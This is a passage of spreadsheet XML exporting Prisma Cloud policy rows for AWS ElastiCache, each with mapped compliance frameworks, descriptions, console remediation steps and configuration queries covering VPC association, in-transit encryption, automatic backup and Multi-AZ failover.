          <t>ISO/IEC 27001:2022, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, NIST CSF, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MLPS 2.0, CIS Controls v8.1, ISO 27002:2022, ISO/IEC 27002:2013, HITRUST v.9.4.2 [Deprecated], NIST SP 800-171 Revision 2, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO 27002:2022, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), ISO/IEC 27002:2013, CIS Controls v8.1, ISO 27002:2022, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, HITRUST CSF v.11.2.0, NIST 800-53 Rev 5, ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, AWS Well-Architected Framework, PCI DSS v4.0, ISO/IEC 27017:2015, NIST 800-53 Rev4, TX-RAMP Level 1, CDC NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, Sarbanes Oxley Act (SOX), PCI DSS v4.0, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, MLPS 2.0 (Level 2), kashan ACSC Information Security Manual (ISM), CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, ISO/IEC 27018:2019, PCI DSS v3.2.1, ISO/IEC 27001:2022, SOC 2, NIST CSF, ISO/IEC 27001:2022, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2022.2.1, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, CIS Controls v7.1, ITSG-33, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CHC HITRUST CSF v.9.6.0, NIST SP 800-172, NIST CSF, kfirdaus AWS Account-CS, ISO 27002:2022, Copy of CIS Controls v8, kashan ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, SOC 2, HITRUST CSF v.9.6.0, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, TX-RAMP Level 2, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CyberSecurity Law of the People's Republic of China, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), CHC HITRUST CSF v.9.6.0, CSA CCM v.4.0.1, HITRUST CSF v.9.6.0, MLPS 2.0 (Level 3)</t>
        </is>
      </c>
      <c r="B1885" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1885" s="2" t="inlineStr"/>
      <c r="D1885" t="inlineStr"/>
      <c r="E1885" t="inlineStr"/>
      <c r="F1885" t="inlineStr"/>
      <c r="G1885" t="b">
        <v>0</v>
      </c>
      <c r="H18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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1885" t="inlineStr">
        <is>
          <t>aws-elasticache</t>
        </is>
      </c>
      <c r="K1885" t="inlineStr">
        <is>
          <t>AWS ElastiCache cluster not associated with VPC</t>
        </is>
      </c>
      <c r="L1885" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1885" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1885" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1885" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1885" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1885" t="inlineStr">
        <is>
          <t>Control Category: 01.0</t>
        </is>
      </c>
      <c r="R1885" t="inlineStr">
        <is>
          <t>01.c</t>
        </is>
      </c>
      <c r="S1885" t="inlineStr"/>
      <c r="T1885" t="b">
        <v>0</v>
      </c>
      <c r="U1885" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1885" t="inlineStr">
        <is>
          <t>aws-elasticache-cache-clusters</t>
        </is>
      </c>
      <c r="W1885" t="inlineStr">
        <is>
          <t>This policy identifies ElastiCache Clusters which are not associated with VPC. It is highly recommended to associate ElastiCache with VPC, as provides virtual network in your own logically isolated area and features such as selecting IP address range, creating subnets, and configuring route tables, network gateways, and security settings.
NOTE: If you created your AWS account before 2013-12-04, you might have support for the EC2-Classic platform in some regions. AWS has deprecated the use of Amazon EC2-Classic for launching ElastiCache clusters. All current generation nodes are launched in Amazon Virtual Private Cloud only. So this policy only applies legacy ElastiCache clusters which are created using EC2-Classic.</t>
        </is>
      </c>
      <c r="X1885" t="inlineStr">
        <is>
          <t>AWS ElastiCache cluster VPC association can be done only at the time of the creation of the cluster. So to fix this alert, create a new cluster with VPC, then migrate all required ElastiCache cluster data from the reported ElastiCache cluster to this newly created cluster and delete reported ElastiCache cluster.
To create new ElastiCache cluster with at-rest encryption set, perform the following:
1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to ElastiCache Dashboard
4. Click on Redis or Memcached based on your requirement
5. Choose cluster parameters as per your requirement
6. Click on 'Advanced Redis settings' to expand the cluster advanced settings panel
7. Select desired VPC for 'Subnet group' along with other parameters
NOTE: If you don't specify a subnet when you launch a cluster, the cluster launches into your default Amazon VPC.
8. Click on 'Create' button to launch your new ElastiCache cluster
To delete reported ElastiCache cluster, perform the following:
1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to ElastiCache Dashboard
4. Select reported cluster
5. Click on 'Delete' button
6. In the 'Delete Cluster' dialog box, if you want a backup for your cluster select 'Yes' from the 'Create final backup' dropdown menu, provide a name for the cluster backup, then click on 'Delete'.</t>
        </is>
      </c>
      <c r="Y1885" t="inlineStr"/>
      <c r="Z1885" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-elasticache-cache-clusters' as X; config from cloud.resource where api.name = 'aws-elasticache-describe-replication-groups' as Y; filter '$.Y.memberClusters contains $.X.cacheClusterId and $.X.cacheClusterStatus equals available and ($.X.cacheSubnetGroupName is empty or $.X.cacheSubnetGroupName does not exist)'; show Y;</t>
        </is>
      </c>
      <c r="AA1885" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1885" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1885" t="inlineStr">
        <is>
          <t>PC-AWS-EC-254</t>
        </is>
      </c>
      <c r="AD1885" t="b">
        <v>1</v>
      </c>
      <c r="AE1885" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1885" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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5" t="inlineStr">
        <is>
          <t>f5b4b962-e053-4e73-94d2-c21bd2520a0d</t>
        </is>
      </c>
      <c r="AI1885" t="inlineStr">
        <is>
          <t>ca4e03f7-9764-48f2-9ae9-d1bbdb9311a8</t>
        </is>
      </c>
      <c r="AJ1885" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1885" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1886">
      <c r="A1886" t="inlineStr">
        <is>
          <t>HIPAA, PCI DSS v4.0, CSA CCM v.4.0.1, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, NIST CSF v2.0, APRA (CPS 234) Information Security, NIST SP 800-172, ISO/IEC 27001:2022, CHC HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, Risk Management in Technology (RMiT), ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], HITRUST v.9.4.2 [Deprecated], PCI DSS v3.2.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, ISO/IEC 27002:2013, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), kashan ACSC Information Security Manual (ISM), NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), NIST CSF, FFIEC, ITSG-33, HITRUST CSF v.11.2.0, Fedramp (Moderate), CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Telecommunications Security Act - TSA, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 2, CIS Controls v7.1, CRI Profile v2.0, Secure Controls Framework (SCF) - 2022.2.1, CRI Profile v1.2.1, CDC NIST 800-53 Rev4, Copy of CIS Controls v8, NIST 800-53 Rev 5, NIST 800-53 Rev4, CyberSecurity Law of the People's Republic of China, ISO 27002:2022, ISO/IEC 27017:2015, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, GDPR, Telecommunications Security Act - TSA, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, ACSC Information Security Manual (ISM), DORA, NIST CSF v2.0, ISO/IEC 27002:2013, ISO/IEC 27002:2013, PCI DSS v4.0, PCI DSS v4.0, Risk Management in Technology (RMiT), MLPS 2.0, ISO/IEC 27018:2019, MAS TRM 2021, kfirdaus AWS Account-CS, CyberSecurity Law of the People's Republic of China, ISO/IEC 27017:2015, SOC 2, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), DORA, CIS Controls v8.1, CSA CCM v.4.0.1, Australian Cyber Security Centre (ACSC) Essential Eight, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, NIST 800-53 Rev 5, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), Microsoft Cloud Security Benchmark v1, APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), CRI Profile v1.2.1, NIST CSF v2.0, SOC 2, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, CRI Profile v2.0, HIPAA, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2024.2, Risk Management in Technology (RMiT), ISO/IEC 27002:2013, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, APRA (CPS 234) Information Security, CCPA 2018, MAS TRM 2021, PIPEDA, ISO/IEC 27002:2013, CIS Controls v8, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, RBI Baseline Cyber Security and Resilience Requirements, CSA CCM v.4.0.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST 800-53 Rev4, PCI DSS v4.0</t>
        </is>
      </c>
      <c r="B1886" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1886" s="2" t="inlineStr"/>
      <c r="D1886" t="inlineStr"/>
      <c r="E1886" t="inlineStr"/>
      <c r="F1886" t="inlineStr"/>
      <c r="G1886" t="b">
        <v>1</v>
      </c>
      <c r="H18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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1886" t="inlineStr">
        <is>
          <t>aws-elasticache</t>
        </is>
      </c>
      <c r="K1886" t="inlineStr">
        <is>
          <t>AWS ElastiCache Redis cluster with in-transit encryption disabled (Replication group)</t>
        </is>
      </c>
      <c r="L1886" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M1886" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1886" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1886" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1886" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1886" t="inlineStr">
        <is>
          <t>AC-1</t>
        </is>
      </c>
      <c r="R1886" t="inlineStr">
        <is>
          <t>AC-17 (2)</t>
        </is>
      </c>
      <c r="S1886" t="inlineStr"/>
      <c r="T1886" t="b">
        <v>0</v>
      </c>
      <c r="U1886" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1886" t="inlineStr">
        <is>
          <t>aws-elasticache-describe-replication-groups</t>
        </is>
      </c>
      <c r="W1886" t="inlineStr">
        <is>
          <t>This policy identifies ElastiCache Redis clusters that are replication groups and have in-transit encryption disabled. It is highly recommended to implement in-transit encryption in order to protect data from unauthorized access as it travels through the network, between clients and cache servers. Enabling data encryption in-transit helps prevent unauthorized users from reading sensitive data between your Redis clusters and their associated cache storage systems.</t>
        </is>
      </c>
      <c r="X1886" t="inlineStr">
        <is>
          <t>AWS ElastiCache Redis cluster in-transit encryption can be set, only at the time of creation of the cluster. So to resolve this alert, create a new cluster with in-transit encryption enabled, then migrate all required ElastiCache Redis cluster data from the reported ElastiCache Redis cluster to this newly created cluster and delete reported ElastiCache Redis cluster.
To create new ElastiCache Redis cluster with In-transit encryption set, perform the following:
1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to ElastiCache Dashboard
4. Click on Redis
5. Click on 'Create' button
6. On the 'Create your Amazon ElastiCache cluster' page,
a. Select 'Redis' cache engine type.
b. Enter a name for the new cache cluster
c. Select Redis engine version from 'Engine version compatibility' dropdown list.
Note: As of July 2018, In-transit encryption can be enabled only for AWS ElastiCache clusters with Redis engine version 3.2.6 and 4.0.10.
d. Click on 'Advanced Redis settings' to expand the cluster advanced settings panel
e. Select 'Encryption in-transit' checkbox to enable encryption along with other necessary parameters
7. Click on 'Create' button to launch your new ElastiCache Redis cluster
To delete reported ElastiCache Redis cluster, perform the following:
1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to ElastiCache Dashboard
4. Click on Redis
5. Select reported Redis cluster
6. Click on 'Delete' button
7. In the 'Delete Cluster' dialog box, if you want a backup for your cluster select 'Yes' from the 'Create final backup' dropdown menu, provide a name for the cluster backup, then click on 'Delete'. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/general-10
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/general-10</t>
        </is>
      </c>
      <c r="Y1886" t="inlineStr"/>
      <c r="Z1886" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-elasticache-describe-replication-groups' AND json.rule = 'transitEncryptionEnabled is false or transitEncryptionEnabled does not exist'
{"category":"General","resourceTypes":["aws_elasticache_replication_group"]}</t>
        </is>
      </c>
      <c r="AA1886" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1886" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1886" t="inlineStr">
        <is>
          <t>PC-AWS-EC-211-CKV_AWS_30</t>
        </is>
      </c>
      <c r="AD1886" t="b">
        <v>1</v>
      </c>
      <c r="AE1886" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1886" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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6" t="inlineStr">
        <is>
          <t>fd782eca-2dba-47b2-b0f4-f949a7916215</t>
        </is>
      </c>
      <c r="AI1886" t="inlineStr">
        <is>
          <t>8d5d0339-c7be-4913-a610-3c7195106f60</t>
        </is>
      </c>
      <c r="AJ1886" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1886" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1887">
      <c r="A1887" t="inlineStr">
        <is>
          <t>TX-RAMP Level 1, NYDFS 23 CRR-NY 500.0, ITSG-33, HITRUST CSF v.11.2.0, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, CIS Controls v8.1, NIST 800-53 Rev 5, DORA, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B1887" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1887" s="2" t="inlineStr"/>
      <c r="D1887" t="inlineStr"/>
      <c r="E1887" t="inlineStr"/>
      <c r="F1887" t="inlineStr"/>
      <c r="G1887" t="b">
        <v>1</v>
      </c>
      <c r="H18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87" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1887" t="inlineStr">
        <is>
          <t>aws-elasticache</t>
        </is>
      </c>
      <c r="K1887" t="inlineStr">
        <is>
          <t>AWS ElastiCache Redis cluster is not configured with automatic backup</t>
        </is>
      </c>
      <c r="L1887" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1887" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1887" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1887" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1887" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1887" t="inlineStr">
        <is>
          <t>BR</t>
        </is>
      </c>
      <c r="R1887" t="inlineStr">
        <is>
          <t>BR-1</t>
        </is>
      </c>
      <c r="S1887" t="inlineStr"/>
      <c r="T1887" t="b">
        <v>0</v>
      </c>
      <c r="U1887" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1887" t="inlineStr">
        <is>
          <t>aws-elasticache-describe-replication-groups</t>
        </is>
      </c>
      <c r="W1887" t="inlineStr">
        <is>
          <t>This policy identifies Amazon ElastiCache Redis clusters where automatic backup is disabled by checking if SnapshotRetentionLimit is less than 1.
Amazon ElastiCache for Redis clusters can back up their data. Automatic backups in ElastiCache Redis clusters ensure data durability and enable point-in-time recovery, protecting against data loss or corruption. Without backups, data loss from breaches or corruption could be irreversible, compromising data integrity and availability.
It is recommended to enable automatic backups to adhere to compliance requirements and enhance security measures, ensuring data integrity and resilience against potential threats.</t>
        </is>
      </c>
      <c r="X1887" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to ElastiCache Dashboard
4. Click on 'Redis caches' under the 'Resources' section
5. Select reported Redis cluster
6. Click on 'Modify' button
7. In the 'Modify Cluster' dialog box, Under the 'Backup' section 
a. Select 'Enable automatic backups'
b. Select the 'Backup node ID' that is used as the daily backup source for the cluster
c. Select the 'Backup retention period' number of days according to your buissness requirements for which automated backups are retained before they're automatically deleted
d. select the 'Backup start time' and 'Backup duration' according to your requirements
8. Click on 'Preview Changes'
9. Select Yes checkbox under 'Apply Immediately' , to apply the configuration changes immediately. If Apply Immediately is not selected, the changes will be processed during the next maintenance window.
10. Click on 'Modify' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-amazon-elasticache-redis-clusters-have-automatic-backup-turned-on
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-amazon-elasticache-redis-clusters-have-automatic-backup-turned-on</t>
        </is>
      </c>
      <c r="Y1887" t="inlineStr"/>
      <c r="Z1887" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-elasticache-describe-replication-groups' AND json.rule = status equal ignore case "available" and snapshotRetentionLimit does not exist or snapshotRetentionLimit &lt; 1
{"category":"General","resourceTypes":["aws_elasticache_cluster"]}</t>
        </is>
      </c>
      <c r="AA1887" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1887" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1887" t="inlineStr">
        <is>
          <t>PC-AWS-EC-1216-CKV_AWS_134</t>
        </is>
      </c>
      <c r="AD1887" t="b">
        <v>1</v>
      </c>
      <c r="AE1887" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1887" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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87" t="inlineStr">
        <is>
          <t>903c9178-b240-45a1-ae2c-59f998b44918</t>
        </is>
      </c>
      <c r="AI1887" t="inlineStr">
        <is>
          <t>50fcfd4b-25fd-47e8-8ffa-917be4f8cfa3</t>
        </is>
      </c>
      <c r="AJ1887" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1887" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1888">
      <c r="A1888" t="inlineStr">
        <is>
          <t>Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), NIST 800-53 Rev4, NIST 800-53 Rev 5, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2022.2.1, NIST SP 800-172, MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, MLPS 2.0 (Level 3), MLPS 2.0, HITRUST CSF v.9.6.0, CIS Controls v8.1, MAS TRM 2021, CyberSecurity Law of the People's Republic of China, MAS TRM 2021, RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, ACSC Information Security Manual (ISM), CHC HITRUST CSF v.9.6.0, TX-RAMP Level 1, kashan ACSC Information Security Manual (ISM), CHC HITRUST CSF v.9.6.0, PCI DSS v3.2.1, kfirdaus AWS Account-CS, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, ITSG-33, NIST SP 800-171 Revision 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, HITRUST v.9.4.2 [Deprecated], GDPR, SOC 2, CIS Controls v8.1, Copy of ACSC Information Security Manual (ISM)-clone, Brazilian Data Protection Law (LGPD), CDC NIST 800-53 Rev4, HITRUST CSF v.9.6.0, TX-RAMP Level 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CIS Controls v7.1, NIST SP 800-172, NIST CSF</t>
        </is>
      </c>
      <c r="B1888" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1888" s="2" t="inlineStr"/>
      <c r="D1888" t="inlineStr"/>
      <c r="E1888" t="inlineStr"/>
      <c r="F1888" t="inlineStr"/>
      <c r="G1888" t="b">
        <v>1</v>
      </c>
      <c r="H18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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1888" t="inlineStr">
        <is>
          <t>aws-elasticache</t>
        </is>
      </c>
      <c r="K1888" t="inlineStr">
        <is>
          <t>AWS ElastiCache Redis cluster with Multi-AZ Automatic Failover feature set to disabled</t>
        </is>
      </c>
      <c r="L1888" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1888" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1888" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1888" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1888" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1888" t="inlineStr">
        <is>
          <t>SI-1</t>
        </is>
      </c>
      <c r="R1888" t="inlineStr">
        <is>
          <t>SI-13 (5)</t>
        </is>
      </c>
      <c r="S1888" t="inlineStr"/>
      <c r="T1888" t="b">
        <v>0</v>
      </c>
      <c r="U1888" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1888" t="inlineStr">
        <is>
          <t>aws-elasticache-describe-replication-groups</t>
        </is>
      </c>
      <c r="W1888" t="inlineStr">
        <is>
          <t>This policy identifies ElastiCache Redis clusters which have Multi-AZ Automatic Failover feature set to disabled. It is recommended to enable the Multi-AZ Automatic Failover feature for your Redis Cache cluster, which will improve primary node reachability by providing read replica in case of network connectivity loss or loss of availability in the primary's availability zone for read/write operations.
Note: Redis cluster Multi-AZ with automatic failover does not support T1 and T2 cache node types and is only available if the cluster has at least one read replica.</t>
        </is>
      </c>
      <c r="X1888" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to ElastiCache Dashboard
4. Click on Redis
5. Select reported Redis cluster
6. Click on 'Modify' button
7. In the 'Modify Cluster' dialog box,
a. Set 'Multi-AZ' to 'Yes'
b. Select 'Apply Immediately' checkbox, to apply the configuration changes immediately. If Apply Immediately is not selected, the changes will be processed during the next maintenance window.
c. Click on 'Modify' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-elasticache-redis-cluster-with-multi-az-automatic-failover-feature-set-to-enabled
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-elasticache-redis-cluster-with-multi-az-automatic-failover-feature-set-to-enabled</t>
        </is>
      </c>
      <c r="Y1888" t="inlineStr"/>
      <c r="Z1888" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-elasticache-describe-replication-groups' AND json.rule = 'automaticFailover equals disabled or automaticFailover does not exist'
{"category":"General","resourceTypes":["aws_elasticache_replication_group"]}</t>
        </is>
      </c>
      <c r="AA1888" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1888" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1888" t="inlineStr">
        <is>
          <t>PC-AWS-EC-213-CKV2_AWS_50</t>
        </is>
      </c>
      <c r="AD1888" t="b">
        <v>1</v>
      </c>
      <c r="AE1888" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1888" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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8" t="inlineStr">
        <is>
          <t>99f6fc8c-27a7-4f30-84ef-9a2388e8e938</t>
        </is>
      </c>
      <c r="AI1888" t="inlineStr">
        <is>
          <t>fb8d5776-0bfa-4349-b1ec-1684f5353707</t>
        </is>
      </c>
      <c r="AJ1888" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1888" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1889">
      <c r="A1889" t="inlineStr">
        <is>
          <t>Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27017:2015, APRA (CPS 234) Information Security, FFIEC, NYDFS 23 CRR-NY 500.0, ISO/IEC 27017:2015, MLPS 2.0 (Level 3), ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, NIST 800-53 Rev4, APRA (CPS 234) Information Security, CDC NIST 800-53 Rev4, TX-RAMP Level 1, HITRUST CSF v.9.6.0, FFIEC, CSA CCM v4.0.12, MAS TRM 2021, MAS TRM 2021, HITRUST CSF v.11.2.0, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, CyberSecurity Law of the People's Republic of China, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST 800-53 Rev 5, CIS Controls v8, FFIEC, NIST CSF, CHC HITRUST CSF v.9.6.0, SOC 2, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CSA CCM v.4.0.1, CHC HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, ISO/IEC 27002:2013, MLPS 2.0, TX-RAMP Level 2, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2022.2.1, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, CSA CCM v.4.0.1, ISO/IEC 27002:2013, TX-RAMP Level 1, APRA (CPS 234) Information Security, TX-RAMP Level 2, PCI DSS v3.2.1, CSA CCM v4.0.12, NIST SP 800-172, CIS Controls v8.1, ISO/IEC 27002:2013, CCPA 2018, ITSG-33, PIPEDA, Brazilian Data Protection Law (LGPD), HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, MLPS 2.0 (Level 2), CIS Controls v7.1, CSA CCM v.4.0.1, kfirdaus AWS Account-CS, CSA CCM v.4.0.1, ISO/IEC 27018:2019, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B1889" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
